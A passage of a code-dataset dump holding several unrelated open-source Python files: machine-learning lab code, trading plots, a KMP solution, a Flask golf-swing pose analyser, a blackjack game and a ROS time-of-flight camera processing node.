pbar.update(1)\n","repo_name":"gregsadetsky/open-access-is-great-but-where-are-the-images","sub_path":"0.scrapers/chicago/0.get_all_search_results.py","file_name":"0.get_all_search_results.py","file_ext":"py","file_size_in_byte":3029,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"40"} +{"seq_id":"1638541793","text":"# -*- coding: utf-8 -*-\n\"\"\"Stochastic Gradient Descent\"\"\"\n\nimport numpy as np\n\n# batch_iter, compute_gradient and compute_loss are provided by the lab's other helper files\n\ndef compute_stoch_gradient(y, tx, w, batch_size):\n \"\"\"Compute a stochastic gradient from just few examples n and their corresponding y_n labels.\"\"\"\n sto_grad = np.zeros(w.shape)\n nb_grad = 0\n for minibatch_y, minibatch_tx in batch_iter(y, tx, batch_size):\n sto_grad += compute_gradient(minibatch_y, minibatch_tx, w)\n nb_grad += 1\n return sto_grad / nb_grad\n \n\n\ndef stochastic_gradient_descent(\n y, tx, initial_w, batch_size, max_iters, gamma):\n \"\"\"Stochastic gradient descent algorithm.\"\"\"\n ws = [initial_w]\n losses = []\n w = initial_w\n \n for n_iter in range(max_iters):\n \n sto_grad = compute_stoch_gradient(y, tx, w, batch_size)\n \n w = w - gamma * sto_grad\n loss = compute_loss(y, tx, w)\n \n ws.append(w)\n losses.append(loss)\n print("Stochastic Gradient Descent({bi}/{ti}): loss={l}, w0={w0}, w1={w1}".format(\n bi=n_iter, ti=max_iters - 1, l=loss, w0=w[0], w1=w[1]))\n \n return losses, ws","repo_name":"Caotick/ADA-ML","sub_path":"labs-ML/ex02/template/stochastic_gradient_descent.py","file_name":"stochastic_gradient_descent.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"8978381731","text":"\nimport os\nimport pandas as pd\nfrom pandas.api.types import CategoricalDtype\nfrom matplotlib.ticker import FormatStrFormatter\nimport matplotlib.ticker as ticker\nfrom .vizualization import Vizualization\n\n\nclass BehaviorAssetDataVisualization(Vizualization):\n\n def __init__(self, ticker: str, start_time: str, end_time: str, data: pd.DataFrame):\n super().__init__()\n self._data = data.copy()\n self._ticker = ticker\n self._start_time = start_time\n self._end_time = end_time\n\n def plot_avg_hourly_spread_trade(self):\n self._data['Hour'] = self._data['il_tz'].dt.hour\n by_hour = self._data.groupby('Hour')['Spread'].mean()\n if (by_hour == 0.0).all():\n return\n else:\n try:\n by_hour = by_hour.to_frame()\n by_hour = by_hour.reset_index()\n by_hour.set_index('Hour', inplace=True)\n title = f'Average Hourly Spread: {self._ticker} {self._start_time} - {self._end_time}'\n fig, ax = self.plt.subplots(figsize=(12, 8))\n by_hour.plot(kind='bar', ax=ax, title=title, fontsize=16)\n self.plt.xlabel('IL Time')\n self.plt.ylabel('Spread')\n plot_type = 'bh_avg_h_spread_plot'\n plot_id = self._generate_id()\n plot_name = plot_id + '-' + plot_type + '.png'\n plots_dir = self._plots_path\n img_path = os.path.join(plots_dir, plot_name)\n self.plt.savefig(img_path)\n self.plt.close()\n except Exception as e:\n print("An error occurred:", str(e))\n return img_path\n\n def plot_avg_hourly_price_change_trade(self):\n try:\n title = f'Average Hourly Price Change ABS: {self._ticker} {self._start_time} - {self._end_time}'\n self._data['Hour'] = self._data['il_tz'].dt.hour\n self._data.dropna().groupby('Hour')['Price Change ABS'].mean().plot(\n kind='bar', figsize=(12, 8), title=title, fontsize=16)\n self.plt.xlabel('IL Time')\n self.plt.ylabel('Price Change')\n plot_type = 'bh_avg_h_price_change_plot'\n plot_id = self._generate_id()\n plot_name = plot_id 
+ '-' + plot_type + '.png'\n plots_dir = self._plots_path\n img_path = os.path.join(plots_dir, plot_name)\n self.plt.savefig(img_path)\n self.plt.close()\n except Exception as e:\n print(\"An error occurred:\", str(e))\n return img_path\n\n def plot_avg_volume_trade(self, freq: str = None):\n freq_str = freq if freq is not None else \"1H\"\n\n if (self._data['Volume'] == 0.0).all():\n return\n\n title = f'Average Volume Traded ({freq_str}): {self._ticker} {self._start_time} - {self._end_time}'\n try:\n if freq is not None:\n self._data = self._data.resample(freq).last().dropna()\n self._data['Day Of Week'] = self._data['il_tz'].dt.strftime(\n '%a')\n self._data.dropna().groupby('Day Of Week')['Volume'].mean().plot(\n kind='bar', figsize=(12, 8), title=title, fontsize=16)\n else:\n self._data['Hour'] = self._data['il_tz'].dt.hour\n self._data.dropna().groupby('Hour')['Volume'].mean().plot(\n kind='bar', figsize=(12, 8), title=title, fontsize=16)\n\n self.plt.gca().yaxis.set_major_formatter(FormatStrFormatter('%.0f'))\n self.plt.xlabel('IL Time')\n self.plt.ylabel('Volume')\n\n plot_type = f'bh_avg_{freq_str}_volume_plot'\n plot_id = self._generate_id()\n plot_name = plot_id + '-' + plot_type + '.png'\n plots_dir = self._plots_path\n img_path = os.path.join(plots_dir, plot_name)\n self.plt.savefig(img_path)\n self.plt.close()\n except Exception as e:\n print(\"An error occurred:\", str(e))\n return img_path\n\n def plot_graularity_cover_cost(self, freq: str = '1H'):\n\n try:\n\n self._data['Cover Costs'] = self._data['Price Change ABS'] > self._data['Spread']\n if freq != '1H':\n self._data = self._data.resample(freq).last().dropna()\n if freq == '1D':\n self._data['Day Of Week'] = self._data['il_tz'].dt.strftime(\n '%a')\n title = f'Cover Costs Granularity(1W): {self._ticker} {self._start_time} - {self._end_time}'\n self._data.dropna().groupby('Day Of Week')['Cover Costs'].mean().plot(\n kind='bar', figsize=(12, 8), title=title, fontsize=16)\n else:\n self._data['Hour'] = self._data['il_tz'].dt.hour\n title = f'Cover Costs Granularity({freq}): {self._ticker} {self._start_time} - {self._end_time}'\n self._data.dropna().groupby('Hour')['Cover Costs'].mean().plot(\n kind='bar', figsize=(12, 8), title=title, fontsize=16)\n\n # Set the y-axis tick format as a percentage\n formatter = ticker.PercentFormatter(xmax=1, decimals=0)\n self.plt.gca().yaxis.set_major_formatter(formatter)\n # Specify the y-axis tick positions\n self.plt.gca().yaxis.set_major_locator(\n ticker.FixedLocator(self.plt.gca().get_yticks()))\n self.plt.xlabel('IL Time')\n self.plt.ylabel('% Bars cover costs')\n plot_type = f'bh_{freq}_cover_costs'\n plot_id = self._generate_id()\n plot_name = plot_id + '-' + plot_type + '.png'\n plots_dir = self._plots_path\n img_path = os.path.join(plots_dir, plot_name)\n self.plt.savefig(img_path)\n self.plt.close()\n except Exception as e:\n print(\"An error occurred:\", str(e))\n return img_path\n","repo_name":"Jenya13/analityc_tele_bot","sub_path":"src/analysis/behavior_asset_visualization.py","file_name":"behavior_asset_visualization.py","file_ext":"py","file_size_in_byte":5955,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"10786793255","text":"# Time: O(n)\n# Space: O(n)\n\nclass Solution(object):\n def canChoose(self, groups, nums):\n \"\"\"\n :type groups: List[List[int]]\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n def getPrefix(pattern):\n prefix = [-1]*len(pattern)\n j = -1\n for i in xrange(1, len(pattern)):\n 
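# prefix[i] is the end index of the longest proper border of pattern[:i+1], or -1;\n # e.g. for pattern 'abab' this loop fills prefix = [-1, -1, 0, 1]; on a mismatch we\n # fall back along ever-shorter borders before trying to extend\n 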
while j+1 > 0 and pattern[j+1] != pattern[i]:\n j = prefix[j]\n if pattern[j+1] == pattern[i]:\n j += 1\n prefix[i] = j\n return prefix\n \n def KMP(text, pattern, start):\n prefix = getPrefix(pattern)\n j = -1\n for i in xrange(start, len(text)):\n while j+1 > 0 and pattern[j+1] != text[i]:\n j = prefix[j]\n if pattern[j+1] == text[i]:\n j += 1\n if j+1 == len(pattern):\n return i-j\n return -1\n\n pos = 0\n for group in groups:\n pos = KMP(nums, group, pos)\n if pos == -1:\n return False\n pos += len(group)\n return True\n\n","repo_name":"kamyu104/LeetCode-Solutions","sub_path":"Python/form-array-by-concatenating-subarrays-of-another-array.py","file_name":"form-array-by-concatenating-subarrays-of-another-array.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":4314,"dataset":"github-code","pt":"40"} +{"seq_id":"23522264759","text":"import os\nimport sys\nimport cv2\nimport json\nimport pickle\nimport numpy as np\nfrom datetime import datetime\nfrom flask import Flask, request, send_from_directory, abort\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nimport torch.nn.functional as F\n\nfrom anal_poses import anal\nfrom anal_poses.utils import MyEncoder\n\n# set the openpose path\nop_path = "C:/openpose/bin/python/openpose/Release"\nsys.path.append(op_path)\nos.environ['PATH'] = os.environ['PATH'] + ';' + 'C:/openpose/bin'\n\n# openpose import\ntry:\n import pyopenpose as op\nexcept ImportError as e:\n raise e\n\n# set the golfDB path\ngolfdb_path = "C:\\\\golfdb\\\\"\nsys.path.append(golfdb_path)\n\ntry:\n from test_video import SampleVideo, event_names\n from eval import ToTensor, Normalize\n from model import EventDetector\nexcept ImportError as e:\n raise e\n\n# start Flask\napp = Flask(__name__, static_url_path='/static')\n\n\n@app.route('/uploads', methods=['POST'])\ndef upload_file():\n print('success')\n file = request.files['video']\n video_path = os.path.join(os.getcwd(), file.filename)\n file.save(video_path)\n\n \"\"\"\n -----------------------\n load the model from golfDB\n -----------------------\n \"\"\"\n print('golfdb start')\n ds = SampleVideo(video_path, transform=transforms.Compose([ToTensor(),\n Normalize([0.485, 0.456, 0.406],\n [0.229, 0.224, 0.225])]))\n\n dl = DataLoader(ds, batch_size=1, shuffle=False, drop_last=False)\n\n model = EventDetector(pretrain=True,\n width_mult=1.,\n lstm_layers=1,\n lstm_hidden=256,\n bidirectional=True,\n dropout=False)\n\n save_dict = torch.load('models/swingnet_1800.pth.tar')\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n print('Using device:', device)\n model.load_state_dict(save_dict['model_state_dict'])\n model.to(device)\n model.eval()\n print("Loaded model weights")\n\n seq_length = 64\n cwd = os.getcwd()\n print(cwd)\n save_path = cwd + '/static/output_images/'\n print(save_path)\n print('Testing...')\n for sample in dl:\n images = sample['images']\n # full samples do not fit into GPU memory so evaluate sample in 'seq_length' batches\n batch = 0\n while batch * seq_length < images.shape[1]:\n if (batch + 1) * seq_length > images.shape[1]:\n image_batch = images[:, batch * seq_length:, :, :, :]\n else:\n image_batch = images[:, batch * seq_length:(batch + 1) * seq_length, :, :, :]\n logits = model(image_batch.cuda())\n if batch == 0:\n probs = F.softmax(logits.data, dim=1).cpu().numpy()\n else:\n probs = np.append(probs, F.softmax(logits.data, dim=1).cpu().numpy(), 0)\n batch += 1\n\n events = np.argmax(probs, axis=0)[:-1]\n 
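# probs stacks one row per frame and one column per class; the column-wise argmax\n # picks, for each swing event, the frame where that event's probability peaks,\n # and [:-1] drops the trailing no-event class\n 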
print('Predicted event frames: {}'.format(events))\n\n \"\"\"\n open the cv2 video capture\n \"\"\"\n cap = cv2.VideoCapture(video_path)\n\n confidence = []\n for i, e in enumerate(events):\n confidence.append(probs[e, i])\n print('Confidence: {}'.format([np.round(c, 3) for c in confidence]))\n\n \"\"\"\n create the openpose wrapper\n and set its parameters\n \"\"\"\n params = dict()\n params["model_folder"] = "C:\\\\openpose\\\\models\\\\"\n params["number_people_max"] = 1\n params["net_resolution"] = "-1x240"\n\n opWrapper = op.WrapperPython()\n opWrapper.configure(params)\n opWrapper.start()\n\n datum = op.Datum()\n\n # use the current timestamp as the filename for the saved images\n now = datetime.now()\n image_save_name = datetime.timestamp(now)\n\n # collect the keypoints of each event frame into a dict\n key_data = dict()\n for i, e in enumerate(events):\n cap.set(cv2.CAP_PROP_POS_FRAMES, e)\n _, img = cap.read()\n # cv2.putText(img, '{:.3f}'.format(confidence[i]), (20, 20), cv2.FONT_HERSHEY_DUPLEX, 0.75, (0, 0, 255))\n\n # feed the frame golfdb extracted to the op object\n datum.cvInputData = img\n opWrapper.emplaceAndPop(op.VectorDatum([datum]))\n key_data[i] = datum.poseKeypoints[0]\n cv2.imwrite(f'{save_path}{image_save_name}_{str(i)}.png', datum.cvOutputData)\n\n cap.release()\n\n # analyse the extracted keypoints\n swing_anal = anal.Anal(key_data)\n\n result = swing_anal.check_all()\n\n # add the path where the images are saved to the result\n result["image_path"] = image_save_name\n\n return json.dumps(result, cls=MyEncoder)\n\n\n@app.route('/get-images/<image_name>/<i>')\ndef get_images(image_name, i):\n\n image = send_from_directory("C:\\\\Users\\\\USER\\\\PycharmProjects\\\\flask_study\\\\static\\\\output_images",\n filename=f"{i}.png", as_attachment=True)\n\n try:\n return image\n except FileNotFoundError:\n abort(404)\n\n\nif __name__ == '__main__':\n app.run(debug=True, host='0.0.0.0', port=80)","repo_name":"muu86/video_upload_flask","sub_path":"op_golfdb.py","file_name":"op_golfdb.py","file_ext":"py","file_size_in_byte":5137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70055948600","text":"from plone.memoize import view\n\nclass ResultsView(object):\n\n @view.memoize\n def __call__(self):\n \"\"\"Return the collection results with saved form submission\"\"\"\n\n if 'nextprev.form' in self.request:\n # Make a fake request with the saved query string and use the\n # publisher code to reconstitute the values\n fake_req = self.request.__class__(\n stdin=None,\n environ={'QUERY_STRING':\n self.context.REQUEST['nextprev.form'],\n 'SERVER_NAME': '', 'SERVER_PORT': ''},\n response=None)\n fake_req.processInputs()\n kw = fake_req.form\n else:\n kw = {}\n\n return self.context.queryCatalog(**kw)\n\n @view.memoize\n def index(self, path):\n \"\"\"Return the index of the item within the results.\"\"\"\n rid = self.context.portal_catalog.getrid(path)\n idx = 0\n for brain in self():\n if brain.getRID() == rid:\n return idx\n idx += 1\n","repo_name":"cedricmessiant/collective.nextprev","sub_path":"collective/nextprev/results.py","file_name":"results.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"26310108135","text":"import random\r\nCARDS = [11, 2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10]\r\ncpu_cards = []\r\nplayer_cards = []\r\n\r\n\r\ndef pick_card():\r\n card_pos = random.randint(0, 12)\r\n # print(card_pos)\r\n return CARDS[card_pos]\r\n\r\n\r\ndef cpu_pick():\r\n cpu_card = pick_card()\r\n cpu_cards.append(cpu_card)\r\n\r\n\r\ndef player_pick():\r\n player_card = pick_card()\r\n 
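# draw one card and add it to the player's hand\r\n 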
player_cards.append(player_card)\r\n\r\n\r\ndef show_hands():\r\n print(f"CPU hand: {cpu_cards}")\r\n print(f"Player hand: {player_cards}")\r\n\r\n\r\ndef check_winner():\r\n player_score = sum(player_cards)\r\n if player_score > 21:\r\n print("You lose!!!")\r\n return False\r\n elif player_score == 21:\r\n print("You win!!!")\r\n return False\r\n else:\r\n return True\r\n\r\n\r\ndef get_card():\r\n answer = input("Do you want to pick a card? y or n:")\r\n if answer == 'y':\r\n player_pick()\r\n elif answer == 'n':\r\n check_winner()\r\n else:\r\n print("Invalid input.")\r\n get_card()\r\n\r\n\r\ndef play():\r\n keep_playing = check_winner()\r\n while keep_playing:\r\n get_card()\r\n show_hands()\r\n keep_playing = check_winner()\r\n\r\n\r\ndef start():\r\n print('Welcome to blackjack game!')\r\n cpu_pick()\r\n player_pick()\r\n player_pick()\r\n show_hands()\r\n play()\r\n\r\n\r\nstart()\r\n","repo_name":"b01tech/python-stydy","sub_path":"blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":1311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18171424295","text":"#!/usr/bin/env python\nfrom __future__ import print_function\n\nimport sys\nimport os\nimport re\nimport copy\nfrom datetime import datetime\nimport time\n\nimport ransac_plane as pyrsc\n\nimport rospy\nimport rosbag\nimport cv2\nimport open3d as o3d\n#import pyransac3d as pyrsc\nimport numpy as np\nimport ros_numpy\nimport tf2_ros as tf2\nimport message_filters\nimport tf2_geometry_msgs\nimport moveit_msgs.msg\nfrom tf2_msgs.msg import TFMessage\nfrom tf.transformations import euler_from_quaternion, quaternion_from_euler\nfrom geometry_msgs.msg import Point, PointStamped, Pose, PoseStamped, TransformStamped\nfrom interactive_markers.interactive_marker_server import InteractiveMarkerServer, InteractiveMarkerFeedback\nfrom visualization_msgs.msg import Marker, InteractiveMarker, InteractiveMarkerControl, MarkerArray\nfrom std_msgs.msg import Empty\nfrom jsk_rviz_plugins.msg import OverlayText\nfrom sensor_msgs.msg import Image, CameraInfo, PointCloud2, PointField\nfrom cv_bridge import CvBridge, CvBridgeError\nfrom image_geometry import PinholeCameraModel\nfrom scipy.spatial import KDTree\nfrom scipy.optimize import least_squares\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\n\nnp.set_printoptions(threshold=sys.maxsize)\n\n# For real time debugging\nclass TimerError(Exception):\n\n \"\"\"A custom exception used to report errors in use of Timer class\"\"\"\n\nclass Timer:\n def __init__(self):\n self._start_time = None\n\n def start(self):\n \"\"\"Start a new timer\"\"\"\n if self._start_time is not None:\n raise TimerError(f"Timer is running. Use .stop() to stop it")\n\n self._start_time = time.perf_counter()\n\n def stop(self):\n \"\"\"Stop the timer, and report the elapsed time\"\"\"\n if self._start_time is None:\n raise TimerError(f"Timer is not running. 
Use .start() to start it\")\n\n elapsed_time = time.perf_counter() - self._start_time\n self._start_time = None\n print(f\"Elapsed time: {elapsed_time:0.4f} seconds\")\n\n\nclass image_converter:\n\n def __init__(self):\n\n # For data analysis\n base_directory = \"/home/introlab/Documents/git_rcm/rcm_poncage/pa_tof/test_data/\"\n test_name = \"data_{0}\" .format(datetime.now())[:-7]\n self.data_directory = os.path.join(base_directory, test_name)\n os.mkdir(self.data_directory)\n\n # IMAGE PIPELINE -------------------------------------------------------------------------------------------------------------\n self.image_intensity_sub = rospy.Subscriber(\"/helios_camera_node/intensity_helios2\", Image, self.callbackIntensity, queue_size=10)\n self.image_points_sub = rospy.Subscriber(\"/helios_camera_node/depth_helios2\", PointCloud2, self.callbackTOF, queue_size=10)\n\n self.bridge = CvBridge()\n\n self.wanted_rate = rospy.get_param(\"/helios_camera_node/node_rate\")\n if rospy.get_param(\"/sensor_used/offline\"):\n self.img_dim_x = 640\n self.img_dim_y = 480\n else:\n self.img_dim_x = rospy.get_param(\"/helios_camera_node/intensity_width\")\n self.img_dim_y = rospy.get_param(\"/helios_camera_node/intensity_height\")\n # Scale larger on takeB to make shure that all of takeA is included\n self.border_size_x_takeA = int(self.img_dim_x * 0.30)\n self.border_size_y_takeA = int(self.img_dim_y * 0.30)\n self.border_size_x_takeB = int(self.img_dim_x * 0.20)\n self.border_size_y_takeB = int(self.img_dim_y * 0.20)\n\n self.last_cv_image_raw = np.zeros((self.img_dim_y,self.img_dim_x,3), dtype=np.uint16)\n self.image_takeA = np.zeros((self.img_dim_y,self.img_dim_x,3), dtype=np.uint16)\n self.image_takeB = np.zeros((self.img_dim_y,self.img_dim_x,3), dtype=np.uint16)\n self.image_algoA = np.zeros((self.img_dim_y,self.img_dim_x,3), dtype=np.uint16)\n self.image_algoB = np.zeros((self.img_dim_y,self.img_dim_x,3), dtype=np.uint16)\n self.image_segmented = np.zeros((self.img_dim_y-2*self.border_size_y_takeA,self.img_dim_x-2*self.border_size_x_takeA,3), dtype=np.uint16)\n\n self.image_pub_textureA = rospy.Publisher(\"image_textureA\", Image, queue_size=10)\n self.image_pub_textureB = rospy.Publisher(\"image_textureB\", Image, queue_size=10) \n self.image_pub_segmented = rospy.Publisher(\"image_segmented\", Image, queue_size=10) \n\n\n # POINTCLOUD PIPELINE --------------------------------------------------------------------------------------------------------\n self.last_pc_msg = PointCloud2()\n self.pc_takeA = np.zeros((self.img_dim_y,self.img_dim_x, 3), dtype=float)\n self.pc_takeB = np.zeros((self.img_dim_y,self.img_dim_x, 3), dtype=float)\n self.dtype_takeA = np.dtype\n self.dtype_takeB = np.dtype\n self.header_takeA = PointCloud2().header\n self.header_takeB = PointCloud2().header\n\n self.Ro = np.ones((self.img_dim_y-2*self.border_size_y_takeA, self.img_dim_x-2*self.border_size_x_takeA), dtype=float)*0.95\n self.n = np.ones_like(self.Ro)*1.15\n self.new_param = False\n\n self.point_cloud_pub_takeA = rospy.Publisher(\"point_cloud_takeA\", PointCloud2, queue_size=10)\n self.point_cloud_pub_takeB = rospy.Publisher(\"point_cloud_takeB\", PointCloud2, queue_size=10)\n self.point_cloud_pub_takeB_inprogress = rospy.Publisher(\"point_cloud_takeB_inprogress\", PointCloud2, queue_size=10)\n self.point_cloud_pub_takeB_warpped = rospy.Publisher(\"point_cloud_takeB_warpped\", PointCloud2, queue_size=10)\n\n self.point_cloud_pub_normalA = rospy.Publisher(\"point_cloud_normalA\", MarkerArray, queue_size=10)\n 
self.point_cloud_pub_normalB = rospy.Publisher("point_cloud_normalB", MarkerArray, queue_size=10)\n\n self.point_cloud_pub_planeA = rospy.Publisher("point_cloud_planeA", Marker, queue_size=10)\n self.point_cloud_pub_planeB = rospy.Publisher("point_cloud_planeB", Marker, queue_size=10)\n\n\n # TEXTOVERLAY ----------------------------------------------------------------------------------------------------------------\n self.points_info = rospy.Publisher("points_info", OverlayText, queue_size=10)\n self.overlay_msg = OverlayText()\n self.overlay_msg.width = 500\n self.overlay_msg.height = 500\n self.overlay_msg.text_size = 10\n self.overlay_msg.left = 10\n self.overlay_msg.top = 10\n self.overlay_msg.font = "Ubuntu Mono Regular"\n self.overlay_msg.bg_color.a = 0\n self.overlay_msg.fg_color.r = 25 / 255.0\n self.overlay_msg.fg_color.g = 1\n self.overlay_msg.fg_color.b = 1\n self.overlay_msg.fg_color.a = 1\n\n \n # RVIZ INTERFACE ----------------------------------------------------------------------------------------------------------------\n self.img_index = 0\n self.full_path = ""\n self.save_image = rospy.Subscriber("/consol_save_image", Empty, self.callbackSaveImage, queue_size=10)\n self.save_takes_in_bag = rospy.Subscriber("/consol_save_takes", Empty, self.callbackSaveTakeInBag, queue_size=10)\n\n self.takenA = False\n self.takenB = False\n self.take_image_A = rospy.Subscriber("/consol_take_image_A", Empty, self.callbackTakeImageA, queue_size=10)\n self.take_image_B = rospy.Subscriber("/consol_take_image_B", Empty, self.callbackTakeImageB, queue_size=10)\n self.run_algo = rospy.Subscriber("/consol_run_algo", Empty, self.runAlgoAndPublish, queue_size=10)\n\n \n def rospc_to_nppc(self, rospc):\n # x = 0, y = 1, z = 2, i = 3\n cloud_tuple = ros_numpy.numpify(rospc)\n dtype = cloud_tuple.dtype\n cloud_array = np.array([[[a,b,c,d] for a, b, c ,d in temp] for temp in cloud_tuple])\n #print(dtype)\n #print(cloud_array.shape)\n #print(cloud_array[320,240])\n return cloud_array, dtype, rospc.header\n\n def nppc_to_rospc(self, nppc, dtype, ros_msg_header):\n # x = 0, y = 1, z = 2, i = 3\n cloud_tuple = np.array([[(a,b,c,d) for a, b, c ,d in temp] for temp in nppc], dtype=dtype)\n #print(cloud_tuple.shape)\n #print(cloud_tuple[320,240])\n cloud_msg = ros_numpy.msgify(PointCloud2, cloud_tuple)\n cloud_msg.header = ros_msg_header # Only parts not inferrable from numpy array + dtype\n return cloud_msg\n\n\n def callbackSaveImage(self, data):\n # Save the current intensity image in the current test folder\n os.chdir(self.data_directory)\n img_bank_array = os.listdir(self.data_directory)\n int_bank_array = []\n for img in img_bank_array:\n int_bank_array.append(int(re.findall(r'\\d+', img)[0]))\n \n try:\n last_img_num = max(int_bank_array)\n except ValueError:\n last_img_num = 0\n \n cv2.imwrite("img_raw{0}.png" .format(last_img_num+1), self.last_cv_image_raw.astype(np.uint16))\n rospy.loginfo("Now {0} images in bank for the current test" .format(last_img_num+1))\n \n def saveTakeInBag(self, base_directory):\n try:\n os.chdir(base_directory)\n bag_name = "default_takes.bag"\n bag = rosbag.Bag(bag_name, 'w')\n\n bag.write("image_takeA", self.bridge.cv2_to_imgmsg(self.image_takeA, "mono16"))\n bag.write("image_takeB", self.bridge.cv2_to_imgmsg(self.image_takeB, "mono16"))\n bag.write("pc_takeA", self.nppc_to_rospc(self.pc_takeA, self.dtype_takeA, self.header_takeA))\n bag.write("pc_takeB", self.nppc_to_rospc(self.pc_takeB, self.dtype_takeB, self.header_takeB)) \n\n except Exception as 
e:\n bag.close()\n rospy.logerr("Something went wrong with the writing of the bag:")\n rospy.logerr(e)\n else:\n bag.close()\n rospy.loginfo("An image and a point cloud (ros_msg) have been saved in {0} for both takes" .format(bag_name))\n\n def callbackSaveTakeInBag(self, data):\n # Save current takes in a rosbag for later default use\n\n # Run only if both takes are acquired\n if(self.takenA and self.takenB):\n self.saveTakeInBag("/home/introlab/Documents/git_rcm/rcm_poncage/pa_tof/launch")\n else:\n rospy.logerr("Data incomplete, at least one take missing")\n\n\n def callbackTakeImageA(self, data):\n rospy.loginfo("Current image saved as A")\n self.image_takeA = self.last_cv_image_raw\n self.pc_takeA, self.dtype_takeA, self.header_takeA = self.rospc_to_nppc(self.last_pc_msg)\n self.takenA = True\n\n def callbackTakeImageB(self, data):\n rospy.loginfo("Current image saved as B")\n self.image_takeB = self.last_cv_image_raw\n self.pc_takeB, self.dtype_takeB, self.header_takeB = self.rospc_to_nppc(self.last_pc_msg)\n self.takenB = True\n\n\n def callbackIntensity(self, data):\n # Update current buffer image\n try:\n self.last_cv_image_raw = self.bridge.imgmsg_to_cv2(data, desired_encoding='mono16')\n except CvBridgeError as e:\n print(e)\n\n def callbackTOF(self, data):\n self.last_pc_msg = data\n \n\n def incidence_angle(self, point_cloud, scaled_pc, border_size_x, border_size_y, color):\n # Point cloud must only have a length of 3 in the last dimension\n cam_pose = np.array([0,0,0]) # Angle computed from normal point of view\n v = scaled_pc - cam_pose\n v = v/np.linalg.norm(v, axis=2)[..., None]\n v_full = point_cloud[..., :3] - cam_pose\n n = np.zeros_like(v)\n\n k = 11 #TODO: adjust according to the rest of the algo\n k_half = int((k-1)/2) # Has to be smaller than border_size_x AND border_size_y\n kernel_size = (k,k)\n # Compute on full pc, but only inner part is used\n v_centroid = cv2.blur(v_full, kernel_size, cv2.BORDER_REPLICATE)\n v_centroid = v_centroid[border_size_y:self.img_dim_y-border_size_y, border_size_x:self.img_dim_x-border_size_x, :]\n\n # For display purposes\n normal_marker_list = []\n normal_marker_index = 0\n\n # Inspired from: https://github.com/PickNikRobotics/rviz_visual_tools/blob/master/src/rviz_visual_tools.cpp\n # and: https://stackoverflow.com/questions/1171849/finding-quaternion-representing-the-rotation-from-one-vector-to-another\n for i in tqdm(range(v.shape[0]), desc="Angle of incidence: ", leave=True):\n for j in range(v.shape[1]):\n v_neighbors = v_full[(i+border_size_y-k_half-1):(i+border_size_y+k_half), (j+border_size_x-k_half-1):(j+border_size_x+k_half), :].reshape(k**2, 3)\n\n u, s, vh = np.linalg.svd(v_neighbors - v_centroid[i, j], full_matrices=False, compute_uv=True)\n if vh[-1,2] < 0:\n n[i,j] = vh[-1,:]\n else:\n n[i,j] = vh[-1,:] * -1\n\n # For display in rviz\n if not normal_marker_index%200:\n marker = Marker()\n marker.header.frame_id = "camera_frame"\n marker.header.stamp = rospy.Time.now()\n marker.type = 0 # Arrow shape\n marker.id = normal_marker_index\n marker.scale.x = 0.002 # m\n marker.scale.y = 0.006 # m\n marker.scale.z = 0.0\n marker.color.r = color[0]\n marker.color.g = color[1]\n marker.color.b = color[2]\n marker.color.a = 0.75\n marker.pose.orientation.x = 0.0 # For warning...\n marker.pose.orientation.y = 0.0 # For warning...\n marker.pose.orientation.z = 0.0 # For warning...\n marker.pose.orientation.w = 1.0 # For warning...\n P_start = Point()\n P_start.x = scaled_pc[i,j,0]\n P_start.y = scaled_pc[i,j,1]\n 
P_start.z = scaled_pc[i,j,2]\n P_end = Point()\n P_end.x = scaled_pc[i,j,0] + (n[i,j,0]/10)\n P_end.y = scaled_pc[i,j,1] + (n[i,j,1]/10)\n P_end.z = scaled_pc[i,j,2] + (n[i,j,2]/10)\n marker.points = [P_start, P_end]\n normal_marker_list.append(marker)\n\n normal_marker_index += 1\n \n product = np.einsum('ijk,ijk->ij', (v * -1), n) # Inverse v and DOT product with n\n theta = np.arccos(product)\n\n return theta, normal_marker_list\n\n\n def global_plane(self, pc, color):\n # Point cloud must only have a length of 3 in the last dimension\n plane = pyrsc.Plane()\n best_eq, best_inliers = plane.fit(pc, 0.0015, minPoints=int(pc.shape[0]*pc.shape[1]*0.4), maxIteration=10000) # Good compromise\n best_eq = np.array(best_eq)\n if(best_eq[3] > 0):\n best_eq = -best_eq\n\n n = best_eq[:3]\n n_norm = np.linalg.norm(n)\n n_normalized = n / n_norm\n unitZ = np.array([0,0,1])\n distance = best_eq[3] / n_norm\n center_point = -1 * distance * n_normalized # Not centered with point cloud... TODO: better fix than middle pixel of the image\n\n orientation = np.cross(unitZ, n_normalized)\n orientation = np.append(orientation, np.dot(unitZ, n_normalized) + np.sqrt(np.linalg.norm(unitZ)**2 + n_norm**2))\n orientation_normalized = orientation / np.linalg.norm(orientation)\n\n marker = Marker()\n marker.header.frame_id = "camera_frame"\n marker.header.stamp = rospy.Time.now()\n marker.type = 1 # Square shape\n marker.id = 0\n marker.scale.x = 1 # m\n marker.scale.y = 1 # m\n marker.scale.z = 0.001 # m\n marker.color.r = color[0]\n marker.color.g = color[1]\n marker.color.b = color[2]\n marker.color.a = 0.5\n #marker.pose.position.x = center_point[0]\n #marker.pose.position.y = center_point[1]\n #marker.pose.position.z = center_point[2]\n mid_point = pc[int(pc.shape[0]/2), int(pc.shape[1]/2), :]\n marker.pose.position.x = mid_point[0]\n marker.pose.position.y = mid_point[1]\n marker.pose.position.z = mid_point[2]\n marker.pose.orientation.x = orientation_normalized[0]\n marker.pose.orientation.y = orientation_normalized[1] \n marker.pose.orientation.z = orientation_normalized[2]\n marker.pose.orientation.w = 